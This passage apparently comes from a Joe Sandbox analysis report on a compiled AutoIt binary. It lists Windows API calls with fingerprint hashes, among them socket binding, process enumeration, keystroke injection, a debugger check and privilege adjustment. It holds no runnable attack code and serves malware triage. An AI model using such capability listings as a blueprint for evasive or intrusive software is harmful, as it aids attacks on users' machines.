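Read the labels as leads, not verdicts. A compiled AutoIt binary carries the whole interpreter runtime, so a function listing like this shows what the runtime is able to do (listen on a TCP socket, force a shutdown, create a shortcut, walk and delete a directory tree); which of those routines the embedded script actually invokes is only visible in the dynamic behaviour and the decompiled script, which this section does not contain.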
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DC9B78
                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DC9C8B
                                                                                                              • Part of subcall function 00DC3874: GetInputState.USER32 ref: 00DC38CB
                                                                                                              • Part of subcall function 00DC3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966
                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DC9BA8
                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DC9C75
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1972594611-438819550
                                                                                                            • Opcode ID: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
                                                                                                            • Instruction ID: 169f150e56df6f9eabea7c39b5520671a8adbec04da6d1f8f9ba486e5b93dbcd
                                                                                                            • Opcode Fuzzy Hash: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
                                                                                                            • Instruction Fuzzy Hash: F6416D7190420AAFCF14EFA4C999FEEBBB4EF05301F244159E805A7191EB319E85CB74
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D69A4E
                                                                                                            • GetSysColor.USER32(0000000F), ref: 00D69B23
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00D69B36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3131106179-0
                                                                                                            • Opcode ID: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
                                                                                                            • Instruction ID: 7cd6acb4d6499b2e4194a1e59e3f0d845624e225170ba44e4b1a4c35f0a14d7f
                                                                                                            • Opcode Fuzzy Hash: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
                                                                                                            • Instruction Fuzzy Hash: 4DA13870208544BFE728AA7D8CB8E7BB6DDDB83310F1C011AF142D6691CA35DE06D672
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
                                                                                                              • Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DD185D
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1884
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00DD18DB
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD18E6
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD1915
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1601658205-0
                                                                                                            • Opcode ID: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
                                                                                                            • Instruction ID: e60fb53f19078cba38c4e73109258f95efd8e9b96aa501ef4cb8b75ac9f7900d
                                                                                                            • Opcode Fuzzy Hash: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
                                                                                                            • Instruction Fuzzy Hash: 4451A175A00200AFDB20EF24C886F2A77A5EB88718F188059FD559F393D671AD458BB1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 292994002-0
                                                                                                            • Opcode ID: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
                                                                                                            • Instruction ID: ac35ea00edb711ec8fa2f6852c34c536e27d884a76df9775820fe996c54c28a9
                                                                                                            • Opcode Fuzzy Hash: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
                                                                                                            • Instruction Fuzzy Hash: F02191357402915FD721AF2BC884B6ABBA5EF85315B2D9068E84ACB351C771EC42CBB0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                            • API String ID: 0-1546025612
                                                                                                            • Opcode ID: 67a6f93223ba72fc63971264a3425ce102c020de5fba4662c4f8e716c95c2cbc
                                                                                                            • Instruction ID: 6d06cf9f30b5352a8b67cfcf13e1a471599c839147611900709de74ec91201a4
                                                                                                            • Opcode Fuzzy Hash: 67a6f93223ba72fc63971264a3425ce102c020de5fba4662c4f8e716c95c2cbc
                                                                                                            • Instruction Fuzzy Hash: 5EA27E70A0061ACBDF25CF58C8407AEB7B1BF54315F2881AAEC55B7284EB70DD85DBA0
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DB82AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen
                                                                                                            • String ID: ($tb$|
                                                                                                            • API String ID: 1659193697-1968160224
                                                                                                            • Opcode ID: 97209c37683deb9847a0eab6998e18b814fe691ff1be2970bd68e2cb61f4439e
                                                                                                            • Instruction ID: 93d4328d292b2c770a54e7e45e0721c6a1f396bf1eb4c499ced25472841ba10e
                                                                                                            • Opcode Fuzzy Hash: 97209c37683deb9847a0eab6998e18b814fe691ff1be2970bd68e2cb61f4439e
                                                                                                            • Instruction Fuzzy Hash: 5B322674A00705DFCB28CF59C481AAAB7F4FF48710B15856EE49ADB3A1EB70E941CB64
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDA6AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00DDA6BA
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00DDA79C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDA7AB
                                                                                                              • Part of subcall function 00D6CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D93303,?), ref: 00D6CE8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1991900642-0
                                                                                                            • Opcode ID: 9b5c35d8178af5c1e6f55863f1f7fdffda77fd4aa18917ce52879d86084e8cbb
                                                                                                            • Instruction ID: 2f83684c3042ebba2e0d6f140756ad3d6680c2e115f3c59a8ad958193b3c79ed
                                                                                                            • Opcode Fuzzy Hash: 9b5c35d8178af5c1e6f55863f1f7fdffda77fd4aa18917ce52879d86084e8cbb
                                                                                                            • Instruction Fuzzy Hash: 4E513E71508350AFD710EF24D886A6BBBE8FF89754F44891DF98597252EB30D908CBB2
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DBAAAC
                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00DBAAC8
                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DBAB36
                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DBAB88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
                                                                                                            • Instruction ID: b747ebf84971c3f7b260bd8175527a2faadafd981acaa0237d8314dcdf06ae44
                                                                                                            • Opcode Fuzzy Hash: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
                                                                                                            • Instruction Fuzzy Hash: 60311630A50348EEFF358B6C8C05BFA7BA6AB45310F08421AF5A2961E0D375C985C77A
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D8BB7F
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00D8BB91
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00E2121C,000000FF,?,0000003F,?,?), ref: 00D8BC09
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00E21270,000000FF,?,0000003F,?,?,?,00E2121C,000000FF,?,0000003F,?,?), ref: 00D8BC36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 806657224-0
                                                                                                            • Opcode ID: 7f84073dc914f57cd1e0019f18ed645e0663fee7255802d8d52848bac68f0529
                                                                                                            • Instruction ID: 49034a21ca6683caccd6e78e38fc49854121ab8e3461e611d962a5698aa5457e
                                                                                                            • Opcode Fuzzy Hash: 7f84073dc914f57cd1e0019f18ed645e0663fee7255802d8d52848bac68f0529
                                                                                                            • Instruction Fuzzy Hash: 9131A071904245EFCB11EF69DC8192DBBB8FF6536071842AAF060EB2B1D7309A45DB70
                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00DCCE89
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00DCCEEA
                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00DCCEFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 234945975-0
                                                                                                            • Opcode ID: 7dedd65df939f7193849057b3481809eca13944c993aed5bb0bfa7fed699d39b
                                                                                                            • Instruction ID: 6901405ae480c2025a7531e1d6e37479ee0bc83de74d868cc2d72031f17cf14f
                                                                                                            • Opcode Fuzzy Hash: 7dedd65df939f7193849057b3481809eca13944c993aed5bb0bfa7fed699d39b
                                                                                                            • Instruction Fuzzy Hash: 29219A719103069BDB209F65C988FAA77FCEF01314F14941EEA4AD7251E770EA458B74
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DC5CC1
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DC5D17
                                                                                                            • FindClose.KERNEL32(?), ref: 00DC5D5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 4d4943f62f271a993a9c98a6c2890107782b94a94e83eacc673a8e8feed4e757
                                                                                                            • Instruction ID: d164a8f939be03c394201b43f0284c40e2ace8c08d1eeb321f190a84d6134b27
                                                                                                            • Opcode Fuzzy Hash: 4d4943f62f271a993a9c98a6c2890107782b94a94e83eacc673a8e8feed4e757
                                                                                                            • Instruction Fuzzy Hash: EC517634604B029FC714DF28D494E9AB7E4FF49314F18855DE99A8B3A2DB30F985CBA1
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00D8271A
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D82724
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00D82731
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
                                                                                                            • Instruction ID: b0487984aa6c81895ed789bcec5900046474b3bc04d71dc33e806b86f227426d
                                                                                                            • Opcode Fuzzy Hash: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
                                                                                                            • Instruction Fuzzy Hash: A931B474951318ABCB21DF65DC89B99BBB8EF08310F5081EAE41CA62A1E7309F858F55
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC51DA
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DC5238
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00DC52A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1682464887-0
                                                                                                            • Opcode ID: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
                                                                                                            • Instruction ID: 48eab4aa910d0379413f6ce181f3f7c75d70d9ecd6d67ae9b8ece85d3f512689
                                                                                                            • Opcode Fuzzy Hash: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
                                                                                                            • Instruction Fuzzy Hash: 97314B75A10619DFDB00DF54D884EADBBF4FF49314F088099E805AB366DB31E85ACBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70668
                                                                                                              • Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70685
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                            • GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 577356006-0
                                                                                                            • Opcode ID: 7d790424738f4f4f13f85a01cf63921364b80372e92efa7602f1106b33fcc6d7
                                                                                                            • Instruction ID: 806a859eaf90627b35903318dbbfcf4b120f4597cec84ec592fff32016d76153
                                                                                                            • Opcode Fuzzy Hash: 7d790424738f4f4f13f85a01cf63921364b80372e92efa7602f1106b33fcc6d7
                                                                                                            • Instruction Fuzzy Hash: 3C1191B2414304EFD718AF54ECC6DAAB7BDEB45714B24852EE45697241EB70FC428B70
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD608
                                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DBD645
                                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD650
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 33631002-0
                                                                                                            • Opcode ID: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
                                                                                                            • Instruction ID: 8f838fc8bc7c5ece16caeacf73a239be1367e9dad809fc627f573c20c414a3df
                                                                                                            • Opcode Fuzzy Hash: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
                                                                                                            • Instruction Fuzzy Hash: E9113C75E05328BBDB109F959C85FEFBFBCEB45B50F108115F904E7290D6704A058BA1
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DB168C
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DB16A1
                                                                                                            • FreeSid.ADVAPI32(?), ref: 00DB16B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
